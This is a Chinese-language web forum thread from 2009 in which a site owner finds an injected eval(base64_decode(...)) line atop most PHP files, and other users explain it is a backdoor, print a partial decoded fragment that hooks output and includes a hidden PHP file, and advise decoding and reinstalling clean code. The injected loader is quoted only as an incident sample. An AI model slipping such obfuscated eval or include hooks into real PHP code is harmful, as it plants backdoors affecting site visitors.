網域名稱俱樂部


返回   網域名稱俱樂部 > 電腦與網路技術 > 電腦網路相關技術
論壇幫助 社區 日曆事件 今日新文章 搜尋

回覆
 
主題工具
  #1  
舊 2009-02-09, 11:57 PM
hgl hgl 目前離線
普通會員
 
註冊日期: 2005-03-15
文章: 66
預設 網站裡的php上頭出現陌生的亂碼

由於最近網站異常,當要查看時,發現網站裡大部份的php檔開頭最上方皆出現如下程式碼..

引用:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZX...')); ?>
小弟擔心是否被植入木馬,不知這是什麼情況?該如何解決?
謝謝!

此篇文章於 2009-02-10 08:30 PM 被 hgl 編輯。
回覆時引用此篇文章
  #2  
舊 2009-02-10, 12:08 AM
lukawa lukawa 目前離線
進階會員
 
註冊日期: 2002-09-23
文章: 117
預設

應該是被植入一些後門程式的連結,連到你網站的人就會中獎
應該可以把那段CODE,用base64_decode顯示出來讀取看看內容
看他到底連到哪裡去,常常會連來連去的
回覆時引用此篇文章
  #3  
舊 2009-02-10, 12:16 AM
hgl hgl 目前離線
普通會員
 
註冊日期: 2005-03-15
文章: 66
預設

引用:
作者: lukawa 查看文章
應該是被植入一些後門程式的連結,連到你網站的人就會中獎
應該可以把那段CODE,用base64_decode顯示出來讀取看看內容
看他到底連到哪裡去,常常會連來連去的
請問如何讀取呢?謝謝!
回覆時引用此篇文章
  #4  
舊 2009-02-10, 06:40 AM
jack111 jack111 目前離線
進階會員
 
註冊日期: 2004-12-28
文章: 475
預設

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/aipubcom/public_html/cgi/photo/theme/jasmin/image/copper.php')){include_once('/home/aipubcom/public_html/cgi/photo/theme/jasmin/image/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode'))



选decode the data from a Base64 string

http://www.motobit.com/util/base64-decoder-encoder.asp
回覆時引用此篇文章
  #5  
舊 2009-02-10, 06:55 AM
lukawa lukawa 目前離線
進階會員
 
註冊日期: 2002-09-23
文章: 117
預設

如上述jack111兄所言,找個online decoder,或是把eval改成echo應該也可以
不過很多編碼,它會好幾層,所以需要有點耐心跟技巧
回覆時引用此篇文章
  #6  
舊 2009-02-10, 08:42 PM
hgl hgl 目前離線
普通會員
 
註冊日期: 2005-03-15
文章: 66
預設

謝謝兩位大大協助幫忙,今天似乎有擴散的情況,解出來的部份有我站內的程式路徑,不知是否為發作源頭所在...?
回覆時引用此篇文章
  #7  
舊 2009-02-10, 08:48 PM
lukawa lukawa 目前離線
進階會員
 
註冊日期: 2002-09-23
文章: 117
預設

我覺得你最好把全部的程式都刪掉,然後重新上傳乾淨沒問題的程式
這樣會最安全
回覆時引用此篇文章
回覆


發文規則
不可以發表新主題
不可以發表回覆
不可以上傳附件
不可以編輯自己的文章

啟用 BB 代碼
論壇啟用 表情符號
論壇啟用 [IMG] 代碼
論壇禁用 HTML 代碼



所有時間均為 +8。現在的時間是 03:51 AM


本站主機由網易虛擬主機代管
Powered by vBulletin® 版本 3.8.4
版權所有 ©2000 - 2024,Jelsoft Enterprises Ltd.